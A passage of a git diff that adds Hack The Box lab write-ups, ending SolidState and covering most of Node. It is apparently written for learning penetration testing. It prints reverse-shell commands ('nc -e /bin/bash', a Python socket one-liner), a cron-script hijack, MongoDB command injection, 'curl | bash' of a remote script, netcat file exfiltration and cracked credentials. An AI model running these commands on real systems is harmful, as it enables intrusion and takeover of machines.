+and we get credentials ! mindy:P@55W0rd1!2@ , from there we'll just ssh as mindy :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → ssh mindy@10.10.10.51
+ The authenticity of host '10.10.10.51 (10.10.10.51)' can't be established.
+ ECDSA key fingerprint is SHA256:njQxYC21MJdcSfcgKOpfTedDAXx50SYVGPCfChsGwI0.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.51' (ECDSA) to the list of known hosts.
+ mindy@10.10.10.51's password:
+ Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
+
+ The programs included with the Debian GNU/Linux system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+ permitted by applicable law.
+ Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
+ mindy@solidstate:~$ id
+ -rbash: id: command not found
+ mindy@solidstate:~$ id
+ -rbash: id: command not found
+ mindy@solidstate:~$ whoami
+ -rbash: whoami: command not found
+ mindy@solidstate:~$ cat user.txt
+
+ 91XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Trying to privesc from a limited rbash shell is quite a pain so let's see if we can find another way in most notably using this exploit :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → searchsploit apache james 2.3
+ ----------------------------------------------------- -------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ----------------------------------------------------- -------------------------------
+ Apache James Server 2.3.2 - Remote Command Execution | exploits/linux/remote/35513.py
+ ----------------------------------------------------- -------------------------------
+ Shellcodes: No Result
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → locate 35513.py
+ /usr/share/exploitdb/exploits/linux/remote/35513.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → cp /usr/share/exploitdb/exploits/linux/remote/35513.py .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → nano 35513.py
+
+
+Now we modify the exploit accordingly :
+
+ _Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → python 35513.py 10.10.10.51
+ [+]Connecting to James Remote Administration Tool...
+ [+]Creating user...
+ [+]Connecting to James SMTP server...
+ [+]Sending payload...
+ [+]Done! Payload will be executed once somebody logs in.
+
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+
+
+
+Now to execute the payload (which is a reverse shell connection on our port 9002) we need to ssh into the machine.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → ssh mindy@10.10.10.51
+ mindy@10.10.10.51's password:
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.51] 39142
+ id
+ uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
+ which python
+ /usr/bin/python
+ python 'import pty;pty.spawn("/bin/bash")'
+ ls
+ bin
+ user.txt
+
+
+And we get an unrestricted shell ! now let's see which files may allow us to effectively privesc this box :
+
+
+ find / -user root -perm -002 -type f -not -path "/proc/*" 2>/dev/null
+ /opt/tmp.py
+ /sys/fs/cgroup/memory/cgroup.event_control
+
+ ls -lash /opt/tmp.py
+ 4.0K -rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py
+
+ cat /opt/tmp.py
+ #!/usr/bin/env python
+ import os
+ import sys
+ try:
+ os.system('rm -r /tmp/* ')
+ except:
+ sys.exit()
+
+ nano /opt/tmp.py
+
+
+And we have a python script that has the 777 permissions ! This is a serious security issue as we're going to demonstrate :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → cd _HTB/SolidState
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → nano tmp.py
+
+
+
+ #!/usr/bin/env python
+ import os
+ import sys
+ try:
+ os.system('/bin/nc -e /bin/bash 10.10.14.11 9003')
+ except:
+ sys.exit()
+
+
+now with this infected python script we make the machine download it in it's /tmp directory :
+
+_Terminal 1:_
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → nc -lvnp 9003
+
+
+` _Terminal 3:_
+
+
+ cd /tmp
+
+ pwd
+ /tmp
+
+ which wget
+ /usr/bin/wget
+
+ wget http://10.10.14.11:8080/tmp.py
+
+ ls
+ tmp.py
+
+ cp tmp.py /opt/tmp.py
+
+ ls -lash /opt
+ total 16K
+ 4.0K drwxr-xr-x 3 root root 4.0K Aug 22 2017 .
+ 4.0K drwxr-xr-x 22 root root 4.0K Jun 18 2017 ..
+ 4.0K drwxr-xr-x 11 root root 4.0K Aug 22 2017 james-2.3.2
+ 4.0K -rwxrwxrwx 1 root root 128 Mar 3 14:07 tmp.py
+
+
+Now we wait a bit and we should catch the incoming reverse shell connection on our 9003 port once the cronjob executes the python script as the root user.
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/SolidState]
+ → nc -lvnp 9003
+ listening on [any] 9003 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.51] 47682
+
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+
+ cat /root/root.txt
+ b4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we recieved our reverse shell connection as root and we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/13.md b/Medium/13.md
new file mode 100644
index 0000000..94e50ed
--- /dev/null
+++ b/Medium/13.md
@@ -0,0 +1,921 @@
+# Node Writeup
+
+
+
+## Introduction :
+
+Node is a medium linux box released back in October 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F 10.10.10.58 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-03 20:32 GMT
+ Nmap scan report for 10.10.10.58
+ Host is up (0.11s latency).
+ Not shown: 98 filtered ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 3000/tcp open ppp
+
+ Nmap done: 1 IP address (1 host up) scanned in 5.26 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap 10.10.10.58 -sCV -p22,3000 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-03 20:33 GMT
+ Nmap scan report for 10.10.10.58
+ Host is up (0.10s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
+ | 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
+ |_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
+ 3000/tcp open hadoop-datanode Apache Hadoop
+ | hadoop-datanode-info:
+ |_ Logs: /login
+ | hadoop-tasktracker-info:
+ |_ Logs: /login
+ |_http-title: MyPlace
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 16.12 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap port picked up a http service running on port 80, so let's try to investigate it with dirsearch/gobuster :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → dirsearch -u http://10.10.10.51:3000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -e php,txt,html -x 200
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, txt, html | HTTP method: get | Threads: 50 | Wordlist size: 87646
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-03_20-40-22.log
+
+ Target: http://10.10.10.51:3000/
+
+ CONNECTION TIMEOUT: There was a problem in the request to:
+
+ Task Completed
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → gobuster dir --url http://10.10.10.58:3000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.58:3000/
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/03/03 20:41:03 Starting gobuster
+ ===============================================================
+ Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.58:3000/faa34154-d721-4655-ac39-9224e8387b5c => 200. To force processing of Wildcard responses, specify the '--wildcard' switch
+
+
+Right away we can see that this box may not be as easy as we think, because bruteforcing files on the website on port 3000 returns the same response (status 200) which basically means that we have nonexistant pages.
+
+
+
+SQL Injection doesn't seem to work here, but nonetheless pressing F12 > Debugger > we see that an angular JS script named profile.js is being used in assets/js/app/controllers/
+
+
+
+Being hinted towards /api/users/ we investigate :
+
+
+
+And we get a few usernames along with their hashes which can be easily identified with hash-identifier :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
+
+ Possible Hashs:
+ [+] SHA-256
+ [+] Haval-256
+
+ Least Possible Hashs:
+ [+] GOST R 34.11-94
+ [+] RipeMD-256
+ [+] SNEFRU-256
+ [+] SHA-256(HMAC)
+ [+] Haval-256(HMAC)
+ [+] RipeMD-256(HMAC)
+ [+] SNEFRU-256(HMAC)
+ [+] SHA-256(md5($pass))
+ [+] SHA-256(sha1($pass))
+ --------------------------------------------------
+
+
+So let's use hashcat to crack them with rockyou.txt, with the correct SHA-256 algorithm :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → hashcat -m 1400 -a 0 hashes /usr/share/wordlists/rockyou.txt
+ hashcat (v3.5.0) starting...
+
+ Dictionary cache hit:
+ * Filename..: rockyou.txt
+ * Passwords.: 14343296
+ * Bytes.....: 139921497
+ * Keyspace..: 14343296
+
+ f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
+ de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake
+ dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester
+
+
+And we get a list of credentals for us to use :
+
+
+ myP14ceAdm1nAcc0uNT manchester
+ tom spongebob
+ mark snowflake
+
+
+So we login as the admin account, and download the myplace.backup file for us to inspect it further :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → cd _HTB
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB]
+ → mkdir Node
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB]
+ → cd Node
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cp /home/nihilist/Downloads/myplace.backup .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → file myplace.backup
+ myplace.backup: ASCII text, with very long lines, with no line terminators
+
+
+so we have some ascii text, but upon opening it we see that it may look like base64 so let's decode it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat myplace.backup | base64 -d > myplace
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → file myplace
+ myplace: Zip archive data, at least v1.0 to extract
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → unzip myplace
+ Archive: myplace
+ creating: var/www/myplace/
+ [myplace] var/www/myplace/package-lock.json password:
+ password incorrect--reenter:
+ password incorrect--reenter:
+ skipping: var/www/myplace/package-lock.json incorrect password
+ creating: var/www/myplace/node_modules/
+ creating: var/www/myplace/node_modules/serve-static/
+ [myplace] var/www/myplace/node_modules/serve-static/README.md password:
+ password incorrect--reenter:
+
+
+And we get a zip archive ! although when we try to unzip it we need to give it a password , and our previous three passwords aren't working here. so let's use fcrackzip and rockyou.txt to try and guess the password :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup
+
+ PASSWORD FOUND!!!!: pw == magicword
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → unzip myplace
+ Archive: myplace
+ [myplace] var/www/myplace/package-lock.json password:
+
+
+So we unzip it and we have a bunch of files to work with, most notably /var/www/myplace/app.js :
+
+
+
+Which reveals mark's password : 5AYRft73VtFpc84k so let's ssh as mark :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → ssh mark@10.10.10.58
+ The authenticity of host '10.10.10.58 (10.10.10.58)' can't be established.
+ ECDSA key fingerprint is SHA256:I0Y7EMtrkyc9Z/92jdhXQen2Y8Lar/oqcDNLHn28Hbs.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.58' (ECDSA) to the list of known hosts.
+ mark@10.10.10.58's password:
+
+ The programs included with the Ubuntu system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
+ applicable law.
+ .-.
+ .-'``(|||)
+ ,`\ \ `-`. 88 88
+ / \ '``-. ` 88 88
+ .-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
+ (:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
+ `-` ` , : 88 88 88 88 88 88 88 88 88 88 88
+ \ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
+ `./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'
+ `-..-( )
+ `-`
+ The programs included with the Ubuntu system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
+ applicable law.
+
+ Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
+
+ mark@node:~$ id
+ uid=1001(mark) gid=1001(mark) groups=1001(mark)
+
+ mark@node:~$ cat /home
+ cat: /home: Is a directory
+
+ mark@node:~$ ls /home
+ frank mark tom
+
+ mark@node:~$ cat /home/mark/user.txt
+ cat: /home/mark/user.txt: No such file or directory
+ mark@node:~$ cat /home/frank/user.txt
+ cat: /home/frank/user.txt: No such file or directory
+ mark@node:~$ cat /home/tom/user.txt
+ cat: /home/tom/user.txt: Permission denied
+
+
+
+As you can see here, we are logged in as mark and we have 3 users to work with : frank, mark and tom. although we need to gain tom's privileges to be able to print the flag. so let's list tom's running processes :
+
+
+ mark@node:~$ ps -ef | grep tom
+ tom 1211 1 0 Mar03 ? 00:00:12 /usr/bin/node /var/www/myplace/app.js
+ tom 1221 1 0 Mar03 ? 00:00:07 /usr/bin/node /var/scheduler/app.js
+ mark 1600 1579 0 06:01 pts/0 00:00:00 grep --color=auto tom
+
+
+So let's investigate /var/scheduler/app.js :
+
+
+ mark@node:~$ cd /var/scheduler
+ mark@node:/var/scheduler$ cat app.js
+ const exec = require('child_process').exec;
+ const MongoClient = require('mongodb').MongoClient;
+ const ObjectID = require('mongodb').ObjectID;
+ const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource;=scheduler';
+
+ MongoClient.connect(url, function(error, db) {
+ if (error || !db) {
+ console.log('[!] Failed to connect to mongodb');
+ return;
+ }
+
+ setInterval(function () {
+ db.collection('tasks').find().toArray(function (error, docs) {
+ if (!error && docs) {
+ docs.forEach(function (doc) {
+ if (doc) {
+ console.log('Executing task ' + doc._id + '...');
+ exec(doc.cmd);
+ db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
+ }
+ });
+ }
+ else if (error) {
+ console.log('Something went wrong: ' + error);
+ }
+ });
+ }, 30000);
+
+ });
+
+
+And here we see the connection to the scheduler database, but what's ineresting is the setInterval function which will basically execute anything under the cmd value before deleting the doc from the collection. So let's log into the scheduler database as the user mark :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → nano nihilist.sh
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat nihilist.sh
+ #!/bin/bash python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.11",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+
+
+ mark@node:/tmp$ wget 10.10.14.11:8080/nihilist.sh && chmod +x nihilist.sh
+ --2020-03-04 06:13:22-- http://10.10.14.11:8080/nihilist.sh
+ Connecting to 10.10.14.11:8080... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 240 [text/x-sh]
+ Saving to: ‘nihilist.sh’
+
+ nihilist.sh 100%[===============================================>] 240 --.-KB/s in 0s
+
+ 2020-03-04 06:13:23 (18.6 MB/s) - ‘nihilist.sh’ saved [240/240]
+
+
+
+
+ mark@node:/tmp$ mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler
+ MongoDB shell version: 3.2.16
+ connecting to: localhost:27017/scheduler
+ > db.tasks.insert({"_id" : ObjectId("50e28180497eade7db1b7a5b"), "cmd" : "/tmp/nihilist.sh"})
+ WriteResult({ "nInserted" : 1 })
+ > db.tasks.find()
+
+
+
+And here we basically copy the /bin/dash binary into the /tmp folder in order to have an executable shell owned by the user tom.
+
+
+ mark@node:~$ mongo -p -u mark scheduler
+ MongoDB shell version: 3.2.16
+ Enter password:
+ connecting to: scheduler
+ > db.tasks.insert( { "cmd" : "cp /bin/dash /tmp/nihilist; chmod 6755 /bin/dash;" })
+ WriteResult({ "nInserted" : 1 })
+ > db.tasks.find()
+ { "_id" : ObjectId("5e5fb1764ae843faaa36fbcc"), "cmd" : "cp /bin/dash /tmp/nihilist; chmod 6755 /bin/dash;" }
+ > db.tasks.find()
+ > exit
+ bye
+ mark@node:~$ ls -lash /tmp/nihilist
+ 152K -rwxr-xr-x 1 tom tom 151K Mar 4 13:48 /tmp/nihilist
+ mark@node:~$
+ mark@node:~$ ls -lash /tmp/nihilist
+ 152K -rwxr-xr-x 1 tom tom 151K Mar 4 13:48 /tmp/nihilist
+ mark@node:~$ /tmp/nihilist -p
+ $ id
+ uid=1001(mark) gid=1001(mark) groups=1001(mark)
+ $ exit
+ mark@node:~$ mongo -p -u mark scheduler
+ MongoDB shell version: 3.2.16
+ Enter password:
+ connecting to: scheduler
+ > db.tasks.insert( { "cmd" : "chmod u+s /tmp/nihilist" } )
+ WriteResult({ "nInserted" : 1 })
+ > db.tasks.find()
+ { "_id" : ObjectId("5e5fb336d83b43a3456459a9"), "cmd" : "chmod u+s /tmp/nihilist" }
+ > db.tasks.find()
+ { "_id" : ObjectId("5e5fb336d83b43a3456459a9"), "cmd" : "chmod u+s /tmp/nihilist" }
+ > db.tasks.find()
+ { "_id" : ObjectId("5e5fb336d83b43a3456459a9"), "cmd" : "chmod u+s /tmp/nihilist" }
+ > db.tasks.find()
+ { "_id" : ObjectId("5e5fb336d83b43a3456459a9"), "cmd" : "chmod u+s /tmp/nihilist" }
+ > db.tasks.find()
+ > exit
+ bye
+ mark@node:~$ /tmp/nihilist -p
+ $ id
+ uid=1001(mark) gid=1001(mark) euid=1000(tom) groups=1001(mark)
+ $ whoami
+ tom
+
+
+
+and here we can see that we have the binary named nihilist, owned by the user tom, therefore running it with the -p flag allows us to have tom's permissions. so let's print the user flag :
+
+
+ mark@node:~$ /tmp/nihilist -p
+ $ id
+ uid=1001(mark) gid=1001(mark) euid=1000(tom) groups=1001(mark)
+ $ cat /home/tom/user.txt
+ cat: /home/tom/user.txt: Permission denied
+ $ whoami
+ tom
+
+ $ cd /home/tom
+ $ mkdir .ssh
+ mkdir: cannot create directory ‘.ssh’: Permission denied
+
+ $ cd ..
+ $ ls -lash
+ total 20K
+ 4.0K drwxr-xr-x 5 root root 4.0K Aug 31 2017 .
+ 4.0K drwxr-xr-x 25 root root 4.0K Sep 2 2017 ..
+ 4.0K drwxr-xr-x 2 root root 4.0K Aug 31 2017 frank
+ 4.0K drwxr-xr-x 3 root root 4.0K Sep 3 2017 mark
+ 4.0K drwxr-xr-x 6 root root 4.0K Sep 3 2017 tom
+
+
+
+Now when we try to somehow edit something in any of the 3 user's directories we cannot , that's because they are owned by root, so let's move onto the root privesc :
+
+## **Part 3 : Getting Root Access**
+
+In order to privesc to the root user, we need to first enumerate the box using LinEnum.sh
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → locate LinEnum.sh
+ /home/nihilist/_HTB/Cronos/LinEnum.sh
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cp /home/nihilist/_HTB/Cronos/LinEnum.sh .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → python -m SimpleHTTPServer 8081
+ Serving HTTP on 0.0.0.0 port 8081 ...
+
+
+` _Terminal 2:_
+
+
+ $ which curl
+ /usr/bin/curl
+ $ curl http://10.10.14.11:8081/LinEnum.sh | bash
+
+
+Not going to paste all the output of LinEnum.sh but we'll get to the interesting part:
+
+
+ $ find / -perm -4000 2>/dev/null
+ /usr/lib/eject/dmcrypt-get-device
+ /usr/lib/snapd/snap-confine
+ /usr/lib/dbus-1.0/dbus-daemon-launch-helper
+ /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
+ /usr/lib/openssh/ssh-keysign
+ /usr/lib/policykit-1/polkit-agent-helper-1
+ /usr/local/bin/backup
+ /usr/bin/chfn
+ /usr/bin/at
+ /usr/bin/gpasswd
+ /usr/bin/newgidmap
+ /usr/bin/chsh
+ /usr/bin/sudo
+ /usr/bin/pkexec
+ /usr/bin/newgrp
+ /usr/bin/passwd
+ /usr/bin/newuidmap
+ /tmp/nihilist
+ /bin/ping
+ /bin/umount
+ /bin/fusermount
+ /bin/ping6
+ /bin/ntfs-3g
+ /bin/su
+ /bin/mount
+
+ $ cd /var
+ $ ls
+ backups cache crash lib local lock log mail opt run scheduler snap spool tmp www
+ $ cd www/myplace
+ $ ls
+ app.html app.js node_modules package.json package-lock.json static
+ $ grep -Ri backup .
+ ./app.js:const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
+ ./app.js: app.get('/api/admin/backup', function (req, res) {
+ ./app.js: var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
+ ./app.js: var backup = '';
+ ./app.js: res.header("Content-Disposition", "attachment; filename=myplace.backup");
+ ./app.js: res.send(backup);
+ ./app.js: backup += chunk;
+ ./static/vendor/jquery/jquery.js: contextBackup = outermostContext,
+ ./static/vendor/jquery/jquery.js: dirrunsUnique = (dirruns += contextBackup == null ? 1 : Math.random() || 0.1),
+ ./static/vendor/jquery/jquery.js: outermostContext = contextBackup;
+ ./static/assets/js/app/controllers/admin.js: $scope.backup = function () {
+ ./static/assets/js/app/controllers/admin.js: $window.open('/api/admin/backup', '_self');
+ ./static/partials/admin.html: Download Backup
+
+
+
+So we do have a few binaries for us to use with the SetUID flags for us to use, most notably the /usr/local/bin/backup that once we grep -Ri we know how it works, but still we have other things to do. but we there is something else we can still do with the mongodb cmd exploit in order to change the permissions of our nihilist binary.
+
+
+ mark@node:~$ mongo -p -u mark scheduler
+ MongoDB shell version: 3.2.16
+ Enter password:
+ connecting to: scheduler
+ > db.tasks.insert( { "cmd" :"chown tom:admin /tmp/nihilist; chmod 6755 /tmp/nihilist;"})
+ WriteResult({ "nInserted" : 1 })
+ > db.tasks.find()
+ > exit
+ bye
+ mark@node:~$ ls -la /tmp/nihilist
+ -rwsr-sr-x 1 tom admin 154072 Mar 4 13:48 /tmp/nihilist
+
+
+And here we execute the nihilist binary to be part of the admin group.
+
+
+ mark@node:~$ /tmp/nihilist -p
+ $ id
+ uid=1001(mark) gid=1001(mark) euid=1000(tom) egid=1002(admin) groups=1002(admin),1001(mark)
+ $ cat /home/tom/user.txt
+ cat: /home/tom/user.txt: Permission denied
+
+
+However as you can see, this is not enough and we still need to escalate more privileges. now before our find command found the /usr/local/bin/backup binary so let's copy it locally on our machine to inspect it :
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → nc -lvnp 8081 > backup
+ listening on [any] 8081 ...
+
+
+` _Terminal 2_
+
+
+ $ nc 10.10.14.11 8081 < /usr/local/bin/backup
+
+
+` _Terminal 1_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → nc -lvnp 8081 > backup
+ listening on [any] 8081 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.58] 36276
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → file backup
+ backup: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=343cf2d93fb2905848a42007439494a2b4984369, not stripped
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → chmod +x backup
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → ./backup
+
+
+once given the permissions to execute backup, we get nothing, so let's examine it using radare2 :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → r2 backup
+ [0x08048780]> aaa
+ [x] Analyze all flags starting with sym. and entry0 (aa)
+ [x] Analyze function calls (aac)
+ [x] Analyze len bytes of instructions for references (aar)
+ [x] Check for objc references
+ [x] Check for vtables
+ [x] Type matching analysis for all functions (aaft)
+ [x] Propagate noreturn information
+ [x] Use -AA or aaaa to perform additional experimental analysis.
+ [0x08048780]> afl
+ [0x08048780]> vvv
+
+
+let's analyse the assembly (aaa) then print out the function list (afl) and then having visual representation (vvv) once we hit spacebar to have a good representating graph of what the binary does :
+
+
+
+from here, we see that the binary's main function checks for the number of arguements equal to 3 and if it returns false, it jumps to the block on the left to exit altogether. which is probably what we're seeing.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → ./backup 1 2 3
+
+
+
+ ____________________________________________________
+ / \
+ | _____________________________________________ |
+ | | | |
+ | | | |
+ | | | |
+ | | | |
+ | | | |
+ | | | |
+ | | Secure Backup v1.0 | |
+ | | | |
+ | | | |
+ | | | |
+ | | | |
+ | | | |
+ | | | |
+ | |_____________________________________________| |
+ | |
+ \_____________________________________________________/
+ \_______________________________________/
+ _______________________________________________
+ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
+ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
+ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
+ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
+ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
+ :-----------------------------------------------------------------------------:
+ `---._.-----------------------------------------------------------------._.---'
+
+
+ [!] Could not open file
+
+
+
+So once we give it 3 arguements it finally prints out something, so let's run strace as we originally intended, but this time using 3 arguements :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → strace ./backup 1 2 3
+
+ [...]
+
+ openat(AT_FDCWD, "/etc/myplace/keys", O_RDONLY) = -1 ENOENT (No such file or directory)
+ write(1, " \33[33m[!]\33[37m Could not open fi"..., 36 [!] Could not open file
+
+ ) = 36
